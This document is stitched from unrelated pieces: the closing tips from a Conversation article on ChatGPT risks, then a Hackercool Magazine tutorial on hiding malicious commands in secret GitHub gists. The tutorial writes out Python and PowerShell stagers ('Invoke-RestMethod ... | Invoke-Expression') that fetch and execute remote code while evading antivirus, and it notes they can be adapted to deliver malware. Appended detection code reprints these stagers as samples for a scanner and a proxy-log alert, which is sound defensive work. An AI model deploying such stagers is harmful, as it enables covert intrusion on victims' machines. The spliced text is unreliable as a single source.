ChatGPT and similar LLMs represent the latest advancements in AI and are freely available for anyone to use. It's important that their users are aware of the risks and how they can use these technologies safely at home or at work. Here are some tips for staying safe. Be more cautious with messages, videos, pictures and phone calls that appear to be legitimate, as these may be generated by AI tools. Check with a second or known source to be sure. Avoid sharing sensitive or private information with ChatGPT and LLMs more generally. Also, remember that AI tools are not perfect and may provide inaccurate responses. Keep this in mind particularly when considering their use in medical diagnoses, work and other areas of life. You should also check with your employer before using AI technologies in your job. There may be specific rules around their use, or they may not be allowed at all. As technology advances apace, we can at least use some sensible precautions to protect against the threats we know about and those yet to come.

This article first appeared in The Conversation.

BYPASSING AV / EDR

How Hackers are using Github to hide their malicious activity

Recently, researchers at Reversing Labs observed a hacker group using Github to hide their malicious activity. Unlike previous cases, this doesn't involve using Github for hosting Command & Control (C&C) infrastructure. In fact, they were using Github this time to hide their malicious commands. How? Let's find out.

What is Github?

Who doesn't know what Github is? It is used to host software repositories and is used by over 100 million developers around the world. We at Hackercool Magazine also use Github to host two repositories belonging to us: Vulnera and Vulnerawa. All good, but Github is not just used for hosting complete software repositories. It has another feature called Gists.

What is a Github Gist?

Github Gist is an innovative feature of Github that allows users (Github users) to store and distribute code snippets without the need of creating a full software repository. Using Github gists, you can store random code, bash scripts, text, comments etc. Gists can also be used to embed this code on a website. There are two types of Gists in Github: Public Gists and Secret Gists. Github public gists are visible on search engines and also on Github Discover. Secret gists are not searchable and are also not visible on Discover. Although they are not visible or searchable, it doesn't mean they are entirely private. If anybody knows the URL of the gist, they can just visit it and view the code you have there.

How to create a Gist?

Needless to say, you need to have a Github account to create any type of gist. Since we have an account, let me demonstrate on our account.
Login to Github and visit the page "https://gists.github.com", then login into your Github account.

[Screenshot: the GitHub Gist page ("Instantly share code, notes, and snippets.") with a new gist containing Python code]

If you are our magazine reader from recent times, you should be familiar with the code I am typing here. Once executed, it creates a new directory named "hackercool" in the tmp folder of the target system. Once you are finished adding code to the gist, scroll down and click on the "Create secret gist" button.

[Screenshot: the created secret gist]

To view the entire URL of the gist, open it as shown and copy it. It needs to be pasted somewhere. The malware observed by Reversing Labs was a Python package which had its malicious code in the setup.py file (we have already seen how to create malicious PyPI packages in an earlier Issue). This malware fetched the commands to be executed on the local machine from a Github Gist. We will do the same, but instead of creating a malicious Python package I will create a simple python script named "test_hc.py" for this, as shown below.

[Screenshot: test_hc.py]

I am pretty sure you will understand the code yourself, but let me explain it to you briefly. The first line imports the "requests" and "os" modules. In the second line, we declare a variable named "url" and assign it the value of the url we just copied earlier (the url of the gist). Yes, this is the same url where we have our secret gist. In the third line, another variable named "res" is created, which gets the value found at the url. In the fourth line, we execute the value found in the "res" variable.

Now, we need to execute this python script. But before that, let's make sure there is no folder named "hackercool" in the tmp folder. Then execute the Python script. The python command will not return any output on screen. But in the tmp folder, a new directory named "hackercool" has been created. We stored a command for our exploit on a Github gist and executed it directly from the target system.

[Screenshot: listing of the tmp folder before and after running test_hc.py]

Another good thing about gists is that we can create code snippets in other languages too, not just python as shown here. We have shown you python because the malware analyzed by Reversing Labs was in python. Now, let's create a PowerShell gist. Go to the gist and open it for editing. Here, I add a script in PowerShell to open Notepad.exe and change the name of the gist to "hc_test.ps1". After making changes, scroll down and click on the "Update secret gist" button.

[Screenshot: editing the gist]

On a Windows machine, I write a PowerShell script named "test_hc.ps1":

    $gistUrl = "https://gist.githubusercontent.com/hackercoolmagz/…/raw/…"
    Invoke-RestMethod -Uri $gistUrl | Invoke-Expression

PowerShell has a cmdlet called Invoke-RestMethod that can be used to execute commands from Github gists. In the first line, we create a variable named gistUrl and assign it the url of our secret gist. In the second line, we use Invoke-RestMethod to execute the code at this gist. Once this PowerShell script is executed, it opens notepad as expected.

Now, do one thing. Observe the code of "test_hc.ps1" and "test_hc.py" carefully. You will find that both these programs do not contain any malicious code for an Antivirus to flag as malicious. If there is anything close to malicious (even though it is not) in these scripts, it is making a connection to an external site, which is Github. So even if anyone observes the traffic these scripts are making, there is nothing malicious in it. It is just making a connection to Github, which is not uncommon at all. Here, for this tutorial, I have used commands like creating a new directory and opening a genuine application. But this can be modified to download and execute malware.

As I already mentioned, secret gists are not visible or searchable.

[Screenshot: a Google search for "github hackercoolmagz" returns only the hackercoolmagz/Vulnera repository, not the gist]

But as we have seen in the code of "test_hc.py" and "test_hc.ps1", gists are entirely accessible provided we have the URL, and are not entirely private. This in itself provides Black Hat Hackers an excellent advantage. Apart from this, hosting their commands on Github gives them undisturbed hosting power. Otherwise, hackers would have to create the C&C infrastructure themselves. Connecting to Github is less suspicious than connecting to some IP address controlled by the hackers. No doubt, Black Hat Hacker groups are adopting this technique to hide their malicious activity.
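A static check for the "fetch, then execute what was fetched" shape that test_hc.py and test_hc.ps1 share, as an added example that is not from the article: the rule set is an assumption, the sample scripts are constructed to match the article's description, and the gist URL is a placeholder.

```python
# Added example, not from the article: a static check for the "fetch, then
# execute what was fetched" shape that the article's test_hc.py and
# test_hc.ps1 share. Neither script contains anything an antivirus signature
# would match, but a network fetch and a dynamic-execution sink in the same
# short script is itself a reportable indicator. The sample scripts are
# constructed to match the article's description; the gist URL is a placeholder.
import re
from typing import List, Tuple

# (language, fetch pattern, execution-sink pattern). An assumed rule set.
RULES: List[Tuple[str, re.Pattern, re.Pattern]] = [
    ("python",
     re.compile(r"\b(requests\.get|urlopen|urllib\.request)\b"),
     re.compile(r"\b(exec|eval)\s*\(")),
    ("powershell",
     re.compile(r"\b(Invoke-RestMethod|Invoke-WebRequest|DownloadString)\b", re.I),
     re.compile(r"\b(Invoke-Expression|iex)\b", re.I)),
]

PS_STAGER = '''$gistUrl = "https://gist.githubusercontent.com/OWNER/GIST_ID_PLACEHOLDER/raw"
Invoke-RestMethod -Uri $gistUrl | Invoke-Expression
'''
PY_STAGER = '''import requests, os
url = "https://gist.githubusercontent.com/OWNER/GIST_ID_PLACEHOLDER/raw"
res = requests.get(url).text
exec(res)
'''
# A benign API client: it fetches, but only parses, what it downloads.
PY_BENIGN = '''import requests
data = requests.get("https://api.github.com/repos/OWNER/REPO").json()
print(data["stargazers_count"])
'''


def fetch_and_exec_hits(script: str, language: str) -> List[str]:
    """Sink names found in a script that also fetches remote content.

    An empty list means the script either fetches nothing over the network
    or never executes what it fetched, so an ordinary API client is not
    flagged. Co-occurrence in one file is a deliberately coarse rule: it
    trades a few false positives for not depending on the remote content.
    """
    for lang, fetch, sink in RULES:
        if lang == language and fetch.search(script):
            return sorted({m.group(1) for m in sink.finditer(script)})
    return []
```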
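On the network side, the connection to Github described above looks ordinary, but the combination of a raw-gist URL with a non-browser client can be keyed on. The detection below over web-proxy log lines is an added example, not from the article or from Reversing Labs: the log lines are constructed, the user-agent markers are assumed typical of python-requests and Windows PowerShell, and the gist id is a placeholder.

```python
# Added example, not from the article or from Reversing Labs: a detection over
# web-proxy log lines for a script (rather than a browser) fetching the raw
# contents of a gist. Log lines are constructed; the user-agent prefixes are
# assumed typical of python-requests and Windows PowerShell, and the gist id
# is a placeholder.
import re
from typing import Dict, List

LINE = re.compile(r'^(\S+) (\S+) (\S+) (\S+) "([^"]*)"$')
RAW_GIST = re.compile(
    r"^https?://gist\.githubusercontent\.com/([^/]+)/([^/]+)/raw(?:/|$)", re.I)
# Assumed markers of scripted clients; extend with what your estate actually sees.
SCRIPT_AGENT_PREFIXES = ("python-requests/", "python-urllib/", "curl/", "Wget/")
SCRIPT_AGENT_MARKERS = ("WindowsPowerShell/", "PowerShell/")

# Constructed proxy log: timestamp, client IP, method, URL, quoted user agent.
SAMPLE_LOG = """\
2024-01-15T10:01:02Z 10.1.1.20 GET https://github.com/hackercoolmagz/Vulnera "Mozilla/5.0 (X11; Linux x86_64) Firefox/121.0"
2024-01-15T10:02:11Z 10.1.1.20 GET https://gist.githubusercontent.com/hackercoolmagz/GIST_ID_PLACEHOLDER/raw/test_hc.py "python-requests/2.31.0"
2024-01-15T10:03:45Z 10.1.1.31 GET https://gist.githubusercontent.com/hackercoolmagz/GIST_ID_PLACEHOLDER/raw/hc_test.ps1 "Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1"
2024-01-15T10:04:00Z 10.1.1.45 GET https://gist.githubusercontent.com/someuser/GIST_ID_PLACEHOLDER/raw/notes.md "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/120.0"
2024-01-15T10:05:30Z 10.1.1.20 GET https://pypi.org/simple/requests/ "pip/23.3"
"""


def is_scripted_client(agent: str) -> bool:
    """True for user agents that belong to scripts and tools, not browsers."""
    return agent.startswith(SCRIPT_AGENT_PREFIXES) or any(
        marker in agent for marker in SCRIPT_AGENT_MARKERS)


def find_raw_gist_fetches(log: str) -> List[Dict[str, str]]:
    """One alert per raw-gist fetch made by a scripted client.

    Browser visits to gists are left alone: a developer reading a gist is
    normal, a script pulling one down and (as in test_hc.py) running it is not.
    """
    alerts = []
    for line in log.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        ts, client, _method, url, agent = m.groups()
        g = RAW_GIST.match(url)
        if g and is_scripted_client(agent):
            alerts.append({"time": ts, "client": client, "gist_owner": g.group(1),
                           "file": url.rsplit("/", 1)[-1], "agent": agent})
    return alerts
```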
